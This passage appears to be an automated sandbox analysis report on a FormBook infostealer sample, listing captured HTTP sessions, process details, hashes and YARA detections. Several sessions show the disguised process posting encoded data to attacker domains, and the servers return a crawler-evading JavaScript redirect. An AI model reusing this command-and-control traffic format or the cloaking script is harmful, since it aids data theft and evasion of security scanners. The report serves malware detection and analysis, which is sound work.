                                              Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.64998945.158.77.253806688C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 20:10:12.032351017 CET656OUTPOST /o5i7/ HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.moritynomxd.xyz
                                              Referer: http://www.moritynomxd.xyz/o5i7/
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Content-Length: 237
                                              Cache-Control: no-cache
                                              User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
                                              Data Raw: 62 78 44 74 53 6a 4a 38 3d 5a 78 34 4b 6b 51 76 78 42 4c 2f 59 69 74 56 67 55 71 33 73 47 64 53 65 49 2f 36 56 65 56 44 55 7a 59 79 4d 44 69 62 74 4d 67 36 4e 4d 72 31 44 44 50 32 59 70 52 35 37 37 79 31 5a 74 42 7a 33 56 41 62 39 78 45 43 6b 4f 70 62 53 72 45 70 42 62 4e 4a 46 4c 45 4b 54 7a 67 63 67 7a 51 70 4f 6d 48 54 4b 5a 79 62 47 75 69 51 70 71 6f 63 31 42 49 73 76 71 56 4d 45 65 66 2f 6e 74 6d 44 51 78 76 44 47 47 47 66 6c 56 53 42 53 63 61 77 2f 46 64 35 71 2b 45 57 46 2b 39 6e 56 74 2b 47 62 63 49 51 63 73 48 55 71 43 62 34 77 52 53 34 69 59 55 36 6c 42 77 70 44 77 30 33 34 5a 44 35 6b 6f 52 5a 66 65 7a 4e 43 56 76 65 4e 43 6b 69 58 58 77 4c 4f 4f 4e 74 78 35 4e 30 7a 31 61 61 36 32 41 3d 3d
                                              Data Ascii: bxDtSjJ8=Zx4KkQvxBL/YitVgUq3sGdSeI/6VeVDUzYyMDibtMg6NMr1DDP2YpR577y1ZtBz3VAb9xECkOpbSrEpBbNJFLEKTzgcgzQpOmHTKZybGuiQpqoc1BIsvqVMEef/ntmDQxvDGGGflVSBScaw/Fd5q+EWF+9nVt+GbcIQcsHUqCb4wRS4iYU6lBwpDw034ZD5koRZfezNCVveNCkiXXwLOONtx5N0z1aa62A==
                                              Jan 10, 2025 20:10:12.732523918 CET729INHTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_8.46.123.189
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 498
                                              X-Ratelimit-Reset: 1736539810
                                              Date: Fri, 10 Jan 2025 19:10:12 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.64999045.158.77.253806688C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 20:10:14.586193085 CET1669OUTPOST /o5i7/ HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.moritynomxd.xyz
                                              Referer: http://www.moritynomxd.xyz/o5i7/
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Content-Length: 1249
                                              Cache-Control: no-cache
                                              User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
                                              Data Raw: 62 78 44 74 53 6a 4a 38 3d 5a 78 34 4b 6b 51 76 78 42 4c 2f 59 69 74 56 67 55 71 33 73 47 64 53 65 49 2f 36 56 65 56 44 55 7a 59 79 4d 44 69 62 74 4d 67 69 4e 50 64 68 44 41 75 32 59 6f 52 35 37 6e 69 31 59 74 42 7a 32 56 44 72 48 78 45 4f 53 4f 71 7a 53 35 32 52 42 65 34 6c 46 65 55 4b 54 37 41 63 62 39 77 6f 4b 6d 44 2f 47 5a 7a 72 47 75 69 51 70 71 72 45 31 49 38 34 76 73 56 4d 44 66 66 2f 67 70 6d 44 30 78 76 61 7a 47 47 62 62 56 69 68 53 66 37 41 2f 44 72 74 71 78 45 57 44 39 39 6e 33 74 2b 36 55 63 49 63 36 73 48 51 51 43 5a 6b 77 52 58 6b 30 4b 58 47 35 63 42 46 46 69 48 4c 71 5a 6c 70 53 73 54 4d 6a 51 54 55 7a 63 4f 4b 37 62 46 57 70 55 78 2b 43 50 62 42 49 6d 70 52 58 6a 70 6e 71 31 65 4b 5a 32 72 79 75 33 79 73 6c 44 78 7a 2f 6d 66 56 58 72 63 45 64 79 4f 52 68 35 74 43 30 56 6a 7a 59 38 4e 49 6e 56 41 2f 4f 50 75 64 76 66 58 55 33 73 6d 48 54 38 6f 6b 6e 50 47 36 75 51 4f 64 4b 63 4b 37 48 32 77 70 49 39 2f 6a 36 52 55 67 32 74 2f 48 43 47 66 6b 34 6a 43 30 6c 6d 41 73 4a 71 6e 56 41 32 [TRUNCATED]
                                              Data Ascii: bxDtSjJ8=Zx4KkQvxBL/YitVgUq3sGdSeI/6VeVDUzYyMDibtMgiNPdhDAu2YoR57ni1YtBz2VDrHxEOSOqzS52RBe4lFeUKT7Acb9woKmD/GZzrGuiQpqrE1I84vsVMDff/gpmD0xvazGGbbVihSf7A/DrtqxEWD99n3t+6UcIc6sHQQCZkwRXk0KXG5cBFFiHLqZlpSsTMjQTUzcOK7bFWpUx+CPbBImpRXjpnq1eKZ2ryu3yslDxz/mfVXrcEdyORh5tC0VjzY8NInVA/OPudvfXU3smHT8oknPG6uQOdKcK7H2wpI9/j6RUg2t/HCGfk4jC0lmAsJqnVA2O9pSwSN/ScVUitrI2du7AIDPu0CF2wrkSS35YPY/1gZvWCwvYQS3Bt/ZktaToCsVpa30PXYZlaU32ylGAvHx5EwKb6Zoy8d3KMP6HLz6/rjvcJk1C4QXX8YvGmGOaAZzbYtzbA2vLAWtI+yoc5imydOUu6wk6mwP8eA7HL2pn3yf8xSoLOrRV7QW8VRqbtxOcmvK2CoK2+i19nTXERJ0LiRZDTwnWrWK7H0gWYL2qr3O5JXxvbhu74LOEo82YkEyhhReZunP6MPcqs7tz5Zrp/Zaikzl6imDzvy3mN4swFlfQl7hhkiCsEpy8rW73LAhU9gz6o8X9FsRzi/A22Uut/O9FdTkTicABRlLUICalcE8Zng5gy7rEgxDf5MJveHQ/eH6azhit9d5/lugQWLMKrG9BIiMiW+hH1qMPPODyZdCK5GOjEypCyr8a/L/roNYH7CD+Wyka25jlCCAvMmPdH7n9qRY4inA1Clwum945pEPjCfxZqSfgoMRe0XQjkah7tPD8fflw/dBx7L6Gx2wRgEwXc4FbFGXSd9vGKloQ2ZV6ae3LgR+Lu2QLCY5shJCiOMo1lYVOodAzhzQTCw89eZ340o90WNnV+db26ik9VMdmoIJeNRF4WtKWN+fcd6gZCXjRg+m7dJVB3UH+T74e78YM5BsDzGte5 [TRUNCATED]
                                              Jan 10, 2025 20:10:15.224539995 CET729INHTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_8.46.123.189
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 497
                                              X-Ratelimit-Reset: 1736539810
                                              Date: Fri, 10 Jan 2025 19:10:15 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.64999145.158.77.253806688C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 20:10:17.122510910 CET372OUTGET /o5i7/?bxDtSjJ8=UzQqnnXvSc3Mr+9QcvCsHMvIJtyRJ1aQrLi0DBTwMAPqBtFAVrqfkCNp/R9/sDvSPASnyWuFHZLa9XQnO8xSKQTT8XEJ9CJbgwDafhDT3FMBtYtvONQCjms9TNvshXbs6vmRQiM=&zj=orBTgZEhYzzl76 HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: */*
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
                                              Jan 10, 2025 20:10:17.773442030 CET729INHTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_8.46.123.189
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 496
                                              X-Ratelimit-Reset: 1736539810
                                              Date: Fri, 10 Jan 2025 19:10:17 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.649992156.242.132.82806688C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 20:10:23.148283958 CET632OUTPOST /pjwm/ HTTP/1.1
                                              Host: www.shanhaiguan.net
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.shanhaiguan.net
                                              Referer: http://www.shanhaiguan.net/pjwm/
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Content-Length: 213
                                              Cache-Control: no-cache
                                              User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
                                              Data Raw: 62 78 44 74 53 6a 4a 38 3d 78 66 6d 56 5a 2b 4c 74 6b 73 6c 56 53 50 65 36 73 6c 7a 61 57 72 38 62 54 78 48 2b 73 2f 63 36 37 4c 57 49 79 47 4b 57 74 2b 70 44 70 35 62 51 36 53 76 2f 4b 6f 32 30 75 72 74 6e 77 6f 56 78 74 35 30 47 62 58 45 50 76 66 56 73 43 69 55 56 55 31 38 6a 30 43 2b 6a 36 2f 57 53 62 70 4f 6a 4e 72 69 35 68 6c 4c 73 4b 36 63 34 39 64 7a 33 51 50 56 2f 2b 50 6f 69 56 49 6c 7a 7a 53 33 7a 2b 44 64 42 75 76 4a 49 4f 37 47 35 45 77 72 77 41 4c 43 6a 32 57 54 66 56 47 4a 4d 49 6e 31 70 73 44 36 31 34 77 41 67 41 46 37 79 33 6f 6c 7a 6d 71 36 5a 64 59 39 49 42 72 33 32 78 4a 48 56 76 35 61 5a 35 39 4f 67 69 35 52 33
                                              Data Ascii: bxDtSjJ8=xfmVZ+LtkslVSPe6slzaWr8bTxH+s/c67LWIyGKWt+pDp5bQ6Sv/Ko20urtnwoVxt50GbXEPvfVsCiUVU18j0C+j6/WSbpOjNri5hlLsK6c49dz3QPV/+PoiVIlzzS3z+DdBuvJIO7G5EwrwALCj2WTfVGJMIn1psD614wAgAF7y3olzmq6ZdY9IBr32xJHVv5aZ59Ogi5R3


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.649993156.242.132.82806688C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 20:10:25.693370104 CET656OUTPOST /pjwm/ HTTP/1.1
                                              Host: www.shanhaiguan.net
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.shanhaiguan.net
                                              Referer: http://www.shanhaiguan.net/pjwm/
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Content-Length: 237
                                              Cache-Control: no-cache
                                              User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
                                              Data Raw: 62 78 44 74 53 6a 4a 38 3d 78 66 6d 56 5a 2b 4c 74 6b 73 6c 56 54 76 75 36 72 43 66 61 58 4c 38 59 57 78 48 2b 6d 66 63 32 37 4c 61 49 79 48 4f 47 73 4e 64 44 6f 59 72 51 6f 41 48 2f 45 49 32 30 38 4c 74 6d 36 49 56 4d 74 35 34 30 62 53 6b 50 76 66 52 73 43 6e 77 56 55 44 30 69 31 53 2b 68 68 76 57 4d 44 4a 4f 6a 4e 72 69 35 68 68 6e 53 4b 36 45 34 38 74 6a 33 52 75 56 38 68 2f 6f 74 44 59 6c 7a 69 69 33 33 2b 44 64 2f 75 75 6c 79 4f 39 43 35 45 78 62 77 41 5a 6d 67 38 57 54 6a 5a 57 49 4d 47 79 49 31 6d 44 54 77 2f 54 45 42 51 56 54 65 2f 2b 6b 70 36 5a 36 36 50 49 64 4b 42 70 76 45 78 70 48 2f 74 35 69 5a 72 71 43 48 74 4e 30 55 54 56 45 46 2f 6f 6a 62 68 48 43 48 5a 52 4f 37 2f 72 6d 6c 4e 51 3d 3d
                                              Data Ascii: bxDtSjJ8=xfmVZ+LtkslVTvu6rCfaXL8YWxH+mfc27LaIyHOGsNdDoYrQoAH/EI208Ltm6IVMt540bSkPvfRsCnwVUD0i1S+hhvWMDJOjNri5hhnSK6E48tj3RuV8h/otDYlzii33+Dd/uulyO9C5ExbwAZmg8WTjZWIMGyI1mDTw/TEBQVTe/+kp6Z66PIdKBpvExpH/t5iZrqCHtN0UTVEF/ojbhHCHZRO7/rmlNQ==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.649995156.242.132.82806688C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 20:10:28.236723900 CET1669OUTPOST /pjwm/ HTTP/1.1
                                              Host: www.shanhaiguan.net
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.shanhaiguan.net
                                              Referer: http://www.shanhaiguan.net/pjwm/
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Content-Length: 1249
                                              Cache-Control: no-cache
                                              User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
                                              Data Raw: 62 78 44 74 53 6a 4a 38 3d 78 66 6d 56 5a 2b 4c 74 6b 73 6c 56 54 76 75 36 72 43 66 61 58 4c 38 59 57 78 48 2b 6d 66 63 32 37 4c 61 49 79 48 4f 47 73 4e 46 44 70 71 6a 51 36 32 50 2f 48 49 32 30 2f 4c 74 72 36 49 56 64 74 35 68 2f 62 53 70 36 76 63 35 73 44 42 38 56 46 52 63 69 2f 53 2b 68 2b 2f 57 52 62 70 4f 54 4e 72 79 39 68 6c 48 53 4b 36 45 34 38 72 50 33 57 2f 56 38 6e 2f 6f 69 56 49 6c 33 7a 53 33 66 2b 41 73 45 75 75 52 69 4f 4e 69 35 46 52 4c 77 43 71 43 67 36 47 54 62 59 6d 49 69 47 79 4d 63 6d 46 33 57 2f 51 59 37 51 53 6a 65 75 61 6c 2b 70 34 62 67 51 4c 4a 77 63 70 76 79 32 75 7a 44 74 4a 6d 75 6a 4a 4f 50 6d 2f 41 36 59 41 6c 64 30 34 6d 38 6a 58 79 6d 57 48 75 72 72 72 33 58 66 66 59 32 70 4c 79 64 41 43 69 32 66 76 78 39 30 34 55 71 38 51 77 38 78 41 69 65 62 44 35 38 56 4f 53 6c 5a 49 48 4f 6d 35 76 7a 55 6c 4f 72 73 32 78 4e 53 6c 75 6f 2b 63 61 4b 36 6b 49 63 46 41 58 6c 64 57 70 4c 51 74 70 7a 74 79 67 71 48 70 6b 34 56 44 79 59 52 50 2f 4d 71 62 44 32 33 64 41 39 39 4e 35 6e 52 [TRUNCATED]
                                              Data Ascii: bxDtSjJ8=xfmVZ+LtkslVTvu6rCfaXL8YWxH+mfc27LaIyHOGsNFDpqjQ62P/HI20/Ltr6IVdt5h/bSp6vc5sDB8VFRci/S+h+/WRbpOTNry9hlHSK6E48rP3W/V8n/oiVIl3zS3f+AsEuuRiONi5FRLwCqCg6GTbYmIiGyMcmF3W/QY7QSjeual+p4bgQLJwcpvy2uzDtJmujJOPm/A6YAld04m8jXymWHurrr3XffY2pLydACi2fvx904Uq8Qw8xAiebD58VOSlZIHOm5vzUlOrs2xNSluo+caK6kIcFAXldWpLQtpztygqHpk4VDyYRP/MqbD23dA99N5nRga/TjvWi+uMY1y45phSekJGXvHdWHHYVfLPUueJqtKH0dvQkmoXgJSIA8A7mozqqCBrQurE3WeU3Xz4klSzDV+sjhxpMMHx2mFEwkbyi838M4tokAgTnKUYIaY0DUzFbj4/PTou5WlpmtMIEs1KHDZissSFr431vCZ2kFklRLq0n9Zd0kOVRbB3y0W4xC35hfciE2a6Z/DJ+XgHmRhC75uX9ZfJiBBPqR9EYBHq4IpreZI2o2KREjK7hb13EgwUBiQQqkclMuBgbxzgbw5+DzoW7J50fbv++++M2WCcFnSf4OG9pZLYz+5tvbN3hkYeWn2rJoVib2p0IhWCoB/cZKqOCH0UYdsgzZebnhEjs+kmxCGqkZwdjKafm9xNfV2EQwK5Gw7QBMymIDaoL8qgHvQ5ScMdVsK76ZpvqMyGRmkxhOabmNkNO7OCkOFgPyUhcxDWDDfzBicgx5BzESiHAAe+RQUsSkrP89XYqC/lMMO4nQqlr3KMh6jfcaZTCiCmAb02xgpwCHXYZU1ox1EEr81+0cEE1av2Q8QnbK7U8noPUwISaHazLGYF/y4i9IvHQCttSHUKaXH76fZ/yqp4bx9ESgrn65xG+9siT0IeRzI4zV7jMt397rSPPsGNB3oMm6eZ6XktcHWAzFm3tWvRgaS0bwVEy5T0Y30 [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.649996156.242.132.82806688C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 20:10:30.781498909 CET372OUTGET /pjwm/?bxDtSjJ8=8dO1aKrXjPlkXvyCnyLGa4pnRyHZl/5Glqi2qmOCi9JNoYrB/H/4K5GJx7Vk3aBG8ot0fyIE2s8PLQIeBQda8ynm0peoT5yaFK2JmAGmcsEs6JHRTdV3uPo4ApQ0nSHi8A1Y4Yw=&zj=orBTgZEhYzzl76 HTTP/1.1
                                              Host: www.shanhaiguan.net
                                              Accept: */*
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:14:08:48
                                              Start date:10/01/2025
                                              Path:C:\Users\user\Desktop\psibx9rXra.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\psibx9rXra.exe"
                                              Imagebase:0xf80000
                                              File size:1'365'504 bytes
                                              MD5 hash:DF44B0A1B0208D51EE82419A7C9FDF47
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:14:08:49
                                              Start date:10/01/2025
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\psibx9rXra.exe"
                                              Imagebase:0xee0000
                                              File size:46'504 bytes
                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2536228710.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2536228710.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2536655020.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2536655020.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:14:09:12
                                              Start date:10/01/2025
